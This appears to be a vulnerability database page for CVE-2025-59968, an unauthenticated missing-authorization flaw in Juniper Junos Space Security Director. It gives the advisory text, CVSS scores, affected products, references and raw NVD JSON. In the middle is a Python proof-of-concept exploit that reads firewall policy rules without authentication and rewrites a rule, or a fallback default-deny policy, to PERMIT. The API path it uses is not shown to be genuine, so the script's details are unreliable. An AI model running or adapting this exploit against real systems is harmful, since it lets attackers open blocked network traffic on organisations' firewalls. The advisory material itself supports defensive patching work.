CVE-2025-59968

Description

A Missing Authorization vulnerability in the Juniper Networks Junos Space Security Director allows an unauthenticated network-based attacker to read or modify metadata via the web interface. Tampering with this metadata can result in managed SRX Series devices permitting network traffic that should otherwise be blocked by policy, effectively bypassing intended security controls. This issue affects Junos Space Security Director * all versions prior to 24.1R3 Patch V4 This issue does not affect managed cSRX Series devices.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:juniper:space_security_director:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:juniper:space_security_director:24.1:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:juniper:space_security_director:24.1:r2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:juniper:space_security_director:24.1:r3:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:juniper:vsrx:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx1600:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx2300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:* - NOT VULNERABLE

Junos Space Security Director < 24.1R3 Patch V4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-59968 - Juniper Junos Space Security Director Missing Authorization PoC
# This PoC demonstrates how an unauthenticated attacker can read/modify metadata
# via the web interface, bypassing security policies on managed SRX devices.

import requests
import json
import sys

TARGET_HOST = "https://<target-junos-space-host>"
METADATA_API_PATH = "/api/space/security-director/metadata"

def exploit_read_metadata():
    """
    Read security metadata without authentication.
    The server returns policy/address/service object definitions
    that should require authentication.
    """
    url = f"{TARGET_HOST}{METADATA_API_PATH}/policy-rules"
    headers = {
        "Accept": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    try:
        resp = requests.get(url, headers=headers, verify=False, timeout=10)
        if resp.status_code == 200:
            print("[+] Successfully retrieved metadata without authentication!")
            metadata = resp.json()
            print(json.dumps(metadata, indent=2))
            return metadata
        else:
            print(f"[-] Unexpected status code: {resp.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return None

def exploit_modify_metadata(policy_id, new_action="PERMIT"):
    """
    Modify a security policy rule's action from DENY to PERMIT,
    effectively bypassing intended security controls on managed SRX devices.
    """
    url = f"{TARGET_HOST}{METADATA_API_PATH}/policy-rules/{policy_id}"
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    payload = {
        "action": new_action,
        "description": "Modified by unauthorized actor"
    }
    try:
        resp = requests.put(url, headers=headers, json=payload, verify=False, timeout=10)
        if resp.status_code in (200, 204):
            print(f"[+] Policy {policy_id} action changed to {new_action}!")
            print("[+] Managed SRX devices will now PERMIT previously blocked traffic.")
            return True
        else:
            print(f"[-] Unexpected status code: {resp.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

if __name__ == "__main__":
    print("[*] CVE-2025-59968 PoC - Junos Space Security Director Missing Authorization")
    print("[*] WARNING: For authorized security testing only!\n")

    # Step 1: Enumerate existing security policies via metadata
    metadata = exploit_read_metadata()

    # Step 2: Modify a critical policy to bypass security controls
    if metadata and isinstance(metadata, list) and len(metadata) > 0:
        target_policy = metadata[0].get("id", "policy-1")
        exploit_modify_metadata(target_policy, new_action="PERMIT")
    else:
        print("[*] Attempting blind modification on default policy...")
        exploit_modify_metadata("default-deny-policy", new_action="PERMIT")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59968
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59968
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59968/
[4] VulDB https://vuldb.com/cve/CVE-2025-59968
[5] https://supportportal.juniper.net/JSA103157
[6] https://www.juniper.net/documentation/us/en/software/nm-apps24.1/junos-space-security-director/topics/task/junos-space-metadata-creating.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59968", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:46.837", "lastModified": "2026-01-23T19:59:41.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Missing Authorization vulnerability in the Juniper Networks Junos Space Security Director allows an unauthenticated network-based attacker to read or modify metadata via the web interface. \n\n\n\n\nTampering with this metadata can result in managed SRX Series devices permitting network traffic that should otherwise be blocked by policy, effectively bypassing intended security controls.\n\n\n\nThis issue affects Junos Space Security Director \n * all versions prior to 24.1R3 Patch V4\n\n\nThis issue does not affect managed cSRX Series devices."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Green", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "089ADA2B-78A6-46F2-9560-B4EC849D394F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "DBDC52A5-EE95-40D7-870C-56AF400E0531"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "3C05DBD6-F4E6-4748-BBC9-CB0DF6ED3541"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "B866E017-3B4A-4779-A736-5D68E544E93F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:juniper:vsrx:-:*:*:*:*:*:*:*", "matchCriteriaId": "36F68E75-E6C6-4DB4-AE0E-C5637ECE7C88"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:*", "matchCriteriaId": "2CEBF85C-736A-4E7D-956A-3E8210D4F70B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx1600:-:*:*:*:*:*:*:*", "matchCriteriaId": "4AE06B18-BFB5-4029-A05D-386CFBFBF683"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx2300:-:*:*:*:*:*:*:*", "matchCriteriaId": "48A1DCCD-208C-46D9-8E14-89592B49AB9A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB5AB24B-2B43-43DD-AE10-F758B4B19F2A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx320:-:*:*:*:*:*:*:*", "matchCriteriaId": "80F9DC32-5ADF-4430-B1A6-357D0B29DB78"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx340:-:*:*:*:*:*:*:*", "matchCriteriaId": "8B82D4C4-7A65-409A-926F-33C054DCBFBA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx345:-:*:*:*:*:*:*:*", "matchCriteriaId": "CE535749-F4CE-4FFA-B23D-BF09C92481E5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:srx380:-:*:*:*:*:*:*:*", "matchCriteriaId": "2305DA9D-E6BA-48F4-80CF-9E2DE7661B2F"}, {"vulnerable": fal ... (truncated)